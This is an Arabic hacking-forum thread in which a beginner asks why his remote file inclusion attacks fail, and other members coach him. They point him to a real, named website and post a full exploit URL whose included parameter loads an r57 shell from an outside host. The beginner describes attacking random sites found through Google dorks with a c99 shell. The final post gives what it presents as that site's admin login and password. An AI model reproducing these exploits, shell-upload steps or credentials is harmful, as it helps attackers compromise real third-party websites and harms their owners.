|
بخصوص رفع الشيل :!! السلام عليكم يا عناكب اليوم عندي سؤال حول رفع الشيل أنا في دائم الأحيان ما أذهب إلى موقع www.milw0rm.com أو www.exploit-db.com و أستخرج بعض الثغرات أقوم بعمل نسخ و لصق للدورك في google تخرج لي العديد من المواقع ( أحاول توضيح إستفساري بطريقة واضحة جدا جدا جدا ) أقوم بفتحها كلها بمعنى الكلمة من الصفحة 1 إلى 50 ( كل المواقع ) أقوم بعمل الإستثمار و وضع الرابط الشيل المباشر مع علامة ? يعني حتى الآن تمام كل شيء إذن المشكلة أنه، تقريبا و في جميع المواقع يظهر التالي : http://img687.imageshack.us/img687/8976/98107066.jpg و هذا طبعا بعد وضع الإستثمار و بعد وضع الشيل و العلامة و أحيانا أخرى تبقى الصفحة بيضاء إذن سؤالي هو : هل هذا يعني أنه تم ترقيغ الثغرة، أم هناك مشكلة في عملي مع العلم أنني جربت كل المواقع و جربت عدة ثغرات لم يصلح معي أي منها تحياتي |
ثغرات الفايل زمانها ضاع |
حبيبي ثغرات الفايل انكلود لم تعد شغالة و غالبا السيرفر مسوي جدار ناري يعني حتى لو الموقع مصاب ما تقدر ترفع شيل الان عصر sql شغالة تمام |
يزيد العتيبي ليه كذا ياغالي الرجل ضيف عندنا وطلب منا المساعدة ما قال لك فيه ثغرة انكلود ولا لا هو اكتشف ثغرة ووجد هناك خطـأ والاخ طلب منا المساعدة لحل هذا الخطـأ يعني لو كان عندك حل لهالموضوع ساعده واذا ماعندك كان مرديت الله يسامحك =============== akram05batna اهلا اخوي منـور منتدانا طبعا بالنسبـة لموضوعك سهل جدا ثغرات الانكلود هي فعلا قديمـة لكن مازالت على قيد الحياة مواقع كثيرة بها خطأ انكلود حتى المواقع العربية بها الخطـأ ولا زالت حتى الان شوف اخوي انت شغلك حلو جدا حتى اثبت شغلك ضع لو موقع واحد فقط حتى نجرب انا وانت كيف بنستغل هالخطأ ونرفع الشل ====================================== الان انا انا بعطيك موقع به خطـأ انكلود اللى ابيه منك استغلال هذا الخطـأ ورفع الشـل اذا ماقدرت اعرف انه شغلك كان غلط x غلط : ولا تيـأس انا سوف اساعدك الى النهايـة ومعنا تصبح محترف باذن الله بعدها سوف اجيبك بكل الاسئلة :: الان تفضـل ..... ! http://www.logicmerce.com/poll/admin/common.inc.php اخي الخطـأ جدا واضح والاستغلال امامك عليك بالباقي حاول مره واثنين وثلاثة اذا عجزت انا بكمل عنك ونرفع الـشل المطلوب في انتظارك اخي بالتوفيــق |
يزيد العتيبي الي قاله تمام ونفس كلام دارك هكر بالنسبه للاخ هيكل الازرق من كلام اخونا اعلاه ظاهر انه يتحدث عن الفايل انكلود مع اصدار php 5 انتهت هاي الثغره وصار استغلالها نادر جدا ما ينجح اقتباس:
المتغير المصاب ما بيطلع بالخطا ما اعرف يلا ان شاء الله خير (مدري عملتوها هوشه ههههه ) حصل خير ان شاء الله |
[align=center]VoLc4n0 اولا اخوي مشكور على المرور اخوي فولكانو انا اسف انت غلطان مع احترامي لك : طبعا انت الكبير فينا وعارف الثغرات واستغلالها لكن انت ماجربت هالموقع اللى انا رفعته روح شوف راح تلاحظ انه هناك متغير موجود بنفس الخطـأ : والله العظيم بدون ان اضيف اي شي بهالملف وانت عارف المتغير ممكن يستخرج بالتخمين او نفس الملف المصاب او عن طريق المصدر اذا كان المحتوى مخفي او ممكن تستخرجه بمتغير مزيف يعني تضع اي متغير وبعدين رابط الشل ويكون اترفع الشل معك طبعا على حسب السيرفرات وضعفها في الحماية و انا وضعتها للتسهبل لـ اخوانا اكرم فقط وماحبيت اتعبه ومع المرور بيشد حيله ويخترق مواقع من ثغرة انكلود وايضا راح يضع لنا مواقع مصابة بالثغرة معليش كلامي طول اخوي فولكانو لكن انت عصبتني :bad: انا في انتظارك اخوي اكرم :) دمتم بخير [/align] |
اقتباس:
D:\Websites\LOGICmerce\www\poll\admin\common.inc.p hp on line 45 PHP Warning: main(/lang/english.php): failed to open stream: No such file or directory in يعني فشل في قرائة ملف english.php في المسار lang خطا عادي من داخل السيرفر ما عنده علاقة يثغرات الانكلود |
d4rK-h4ck3r مشكور اخوي على المرور يعني مافي متغير في الخطـأ ...... ؟ مانقدر نستغل ونزرع الشل .... ؟ في انتظار ردك ================== انا ماابي ارد الحين لاني متأكد من الاستغلال اولا خل الاخ اكرم يدخل ويجرب يستغلها واذا ماعرف انا بضع الاستغلال بنفسي وبتعرفو دمت اخوي بالف خير |
لوول الثغره ع الي موجود موجوده بس المتغير مو طالع معي يلا حصل خير |
بارك الله فيكم إخواني على المرور أخي يزيد تشكر، لكن يعني ما زلت مبتدئ، و لا زال علي إستغلال هذه الثغرة و ذلك أولا للتطبيق مع الدروس، بعدها ممكن أنتقل إلى sql و باقي الثغرات أخي دارك بارك الله فيك على رأيك، و أنا قلت، لما أكمل مشواري في التعلم راح أنتقل إلى مستوى آخر أخي الكريم فولكانو مشكور على المرور و على المتابعة الدائمة منك صراحة مدير مثلك ولا خلي :) -------------------------------------------------- الآن أخي الكريم الهيكل الأزرق، آسف على التأخير، و ذلك أنني حاولت إستثمار الثغرة، و لكن بدون جدوى يعني أنا لست فاهم جيدا الأمر، هذا الموقع الذي أعطيتني له، لم تعطني الثغرة معه و أنا لست عارف الملف المصاب هنا ( لا زلت مبتدئ ) أنا بصراحة لا زلت في الإختراق العشوائي المهم راح أجيبك أنا رحت بحثت في موقع www.exploit-db.com عن ثغرات remote file include أعطاني عدة ثغرات، قمت بإختيار التي تحتوي على الدورك مثلا لنفترض أنني إخترت الثغرة التي تحمل الدورك inurl:"com_mojo" ( نسيت إسم الثغرة ) و إستغلالها هو : http://www.site.com/components/com_m...ute_path=shell قمت بإدخال الدورك في google، ظهرت العديد من المواقع نفترض أننا إخترنا هذا الموقع : http://www.shineonbrightly.com/compo...temid,44/p,92/ فلنقم الآن بعمل الإستثمار : http://www.shineonbrightly.com/compo...y.com/c99.txt? الآن كل شيء تمام، أليس هذا صحيحا ؟ لنقم بإلصاق الإستغلال في المتصفح هنا يأتي سؤال، لاحظ حبيبي ماذا ينتج : http://img687.imageshack.us/img687/8976/98107066.jpg و هكذا مع باقي المواقع ( نصف هكذا و نصف صفحة بيضاء ) هل عملي صحيح ؟ هل أنا مخطئ في شيء ؟ ( لا أظن ) قمت بإختيار ثغرة أخر من نوع remote file include يبقى نفس الشيء ------------------------------------------------------- بالنسبة للموقع الذي أنت وضعته بصراحة لم أفهم شيء، لأني بدون وضع الإستغلال لا أستطيع عمل شيء، و ذلك أنني مبتدئ في هذا المجال يا ريت يا غالي تشرح لنا طريقة و الله بارك الله فيك يا ولد بلادي صراحة أول مرة أرى شخص يريد يتابع إستفسار شخص ما بهذه الطريقة فبارك الله فيك و جعلها اللهم في ميزان حسناتك تحياتي لك و لباقي الإخوة |
akram05batna اهلا اخي منور اخي اكرم انا الان سوف اضع لك الاستغلال واكشف لك المتغير وعلى حسب كلام اخوي فولكانو يقول لا وجود لــ متغير في نص الخطـأ لكن تابع معي اخوي اكرم الموقع المطلوب هو http://www.logicmerce.com/poll/admin/common.inc.php الان كل شي تمام نص الخطـأ هو كود PHP: لاحظ النص : base_path in D:\Websites\LOGICmerce\www\poll\admin\common.inc.p hp شوف المتغير < base_path > اذن الاستغلال بيكون كذا :: http://www.logicmerce.com/poll/admin...php?base_path= الان كل شي تمام اخير نضع رابط الشل تفضـل ... ! http://www.idasy.com/r57.txt? الاستغلال كامل هو http://www.logicmerce.com/poll/admin...y.com/r57.txt? ومبروك عليك وان شاء الله تكون فهمت طبعا اخي المهم ابيك تعرف كيف تحصل على المتغير بعد دخولك للشل اقرأ الملف هذا : common.inc.php ابحث عن /admin/ بتلاحظ بوجود الممتغير الصحيح له والان اتمنى تكون فهمت اخي الغالي اكرم بالتوفيق لك وللجميــع |
اقتباس:
بكل صراحه انت مبدع فاجئتني بحركتك :18: تحياتي يا بطل |
بصراحة أخي الهيكل الأزرق بارك الله فيك و ما شاء الله عليك لو أقول لك شيء هل تصدقني ؟ أقسم لك بالله منذ تعلمي 2 أشهر الآن فمهت منك جزء من ثغرة Remote File Include يعني يا غالي قصدك أنه لما ينتج خطأ مثل هذا، نقوم بإضافة المتغير مع إضافة الشيل ما شاء الله و الله فمهت، لكن فقط لو تكرمت سؤال أخير ليتضح لي كل شيء بإذن الله كيف لي أن أكشف الخطأ في الموقع، مثلا هذا الموقع كيف إكتشفت تلك الصفحة أنت كذلك هل أنا في عملي كما ذكرت لك في الرد رقم 10، هل عملي صحيح، و هل هكذا مع كل و باقي الثغرات ؟ و بارك الله فيك و مشكور مرة ثانية، و صراحة تستاهل كل خير، و أنت شرف لهذا المنتدى يا غالي |
اقتباس:
صحيح 100% لكن الثغره تكون مرقعه لكتشاف مثل هذه الثغرات يفضل تحميل السكربتات على جهازك وفحصها بنفسك |
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . http://www.logicmerce.com/poll/admin/index.php User name : admin Password : assist |
| الساعة الآن 11:06 AM |
[ vBspiders.Com Network ]